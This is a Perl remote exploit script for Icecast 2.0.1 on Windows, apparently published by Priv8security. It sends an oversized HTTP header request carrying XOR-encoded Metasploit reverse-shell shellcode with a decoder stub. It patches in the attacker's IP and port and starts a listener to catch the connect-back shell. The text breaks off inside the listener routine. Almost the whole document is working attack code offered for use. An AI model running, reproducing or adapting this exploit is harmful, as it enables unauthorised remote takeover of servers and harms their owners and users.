#!/usr/bin/perl
################################################
# Priv8security.com remote Icecast 2.0.1 for windows exploit.
#
# Bug found by Luigi Auriemma
# Url: http://aluigi.altervista.org/adv/iceexec-adv.txt
#
# This exploit give you a nice reverse shell on a host running
# Icecast 2.0.1 on windows.
# Older versions not tested.

use IO::Socket;

use Getopt::Std; getopts('h:i:l:p:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'i'})) { $yourip = $args{'i'}; }
if (defined($args{'l'})) { $yourport = $args{'l'}; }else{$yourport = 6969;}
if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 8000;}

print STDERR "-=[Priv8security.com Icecast 2.0.1 remote exploit]=-\n\n";
if (!defined($host) || !defined($yourip)) {
print STDERR "Options:
-h Victim ip.
-i Ip to connect back.
-l Port to connect back.
-p Port to attack.\n\n";
print STDERR "Usage: perl $0 -h Victim -i YOURIP\n\n";
exit;
}

$off_port = 161;
$port_bin = reverse(pack("S", $yourport));

$off_host = 154;
$host_bin = gethostbyname($yourip);

$shellcoder = # win32 reverse by hdm[at]metasploit.com
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa".
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2".
"\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e".
"\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64".
"\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57".
"\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a".
"\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8".
"\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90".
"\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57".
"\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02".
"\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44".
"\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe".
"\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d".
"\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00".
"\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24".
"\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b".
"\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb".
"\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0".
"\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b".
"\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b".
"\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

substr($shellcoder, $off_port, 2, $port_bin);
substr($shellcoder, $off_host, 4, $host_bin);
$xor = 0x99;

foreach my $char (split(//, $shellcoder)) #xor the shellcode to avoid nulls
{
$res .= chr(ord($char) ^ $xor);
}

$scxored = $res;

$len = pack("S", 0xffff - length($scxored));

$decoder = #decoder from Metasploit.com by hdm[at]metasploit.com
"\xd9\xe1". # fabs
"\xd9\x34\x24". # fnstenv (%esp,1)
"\x5b". # pop %ebx
"\x5b". # pop %ebx
"\x5b". # pop %ebx
"\x5b". # pop %ebx
"\x80\xeb\xe7". # sub $0xe7,%bl
#
# short_xor_beg:
#
"\x31\xc9". # xor %ecx,%ecx
"\x66\x81\xe9$len". # sub $len,%cx
#
# short_xor_xor:
#
"\x80\x33\x99". # xorb $0x99,(%ebx)
"\x43". # inc %ebx
"\xe2\xfa";

$buffer = "\xeb\x04" . "AA: " . "\x90" x 10 . $decoder . $scxored . "\r\n";
$crap = "AAAA: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";
$pacote = "GET / HTTP/1.0\r\nHost: Priv8security.com\r\n";
$pacote .= $crap x 30 . $buffer . "\r\n";

$b = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "Cant connect: $!\n";

Listenshell($yourport);

print STDERR "[+] Sending our stuff... ";
$b->send($pacote);
print STDERR "DOne!\n";
print STDERR "[+] Now wait for connectback shell...\n";

sub Listenshell {
my ($lport) = @_;

my $lsock = IO::Socket::INET->new(Proto=>"tcp",LocalPort=>$lport,Type=>SOCK_STREAM,Listen=>3,ReuseAddr=>1)
or die "[-] Error starting listener: $!\n";

print "[+] Listener started on port $lport\n";

die "cant fork: $!" unless defined($listen_pid = fork());
if ($listen_pid) {

my $cback;

while ($cback = $lsock->accept()){

print STDOUT "[+] Starting Shell " . $cback->peerhost . ":" . $cback->peerport . "\n\n";

print $cback "\n";

die "cant fork: $!" unless defined($pid = fork());

if ($pid) {